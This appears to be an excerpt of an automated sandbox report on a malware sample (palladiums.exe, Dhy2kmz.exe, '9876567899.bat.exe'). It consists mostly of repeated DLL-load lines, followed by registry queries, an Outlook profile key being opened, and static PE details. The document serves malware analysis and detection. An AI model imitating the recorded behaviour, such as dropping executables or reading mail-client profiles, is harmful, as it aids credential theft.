Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: wldp.dll

Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook

Jump to behavior

Source: 9876567899.bat.exe

Static file information: File size 1176576 > 1048576

Source: 9876567899.bat.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: 9876567899.bat.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: 9876567899.bat.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: 9876567899.bat.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: 9876567899.bat.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: 9876567899.bat.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: 9876567899.bat.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: Dhy2kmz.exe, 00000004.00000002.2170113887.0000000006900000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: palladiums.exe, 00000002.00000003.2024229175.00000000037C0000.00000004.00001000.00020000.00000000.sdmp, palladiums.exe, 00000002.00000003.2024732170.0000000003A10000.00000004.00001000.00020000.00000000.sdmp
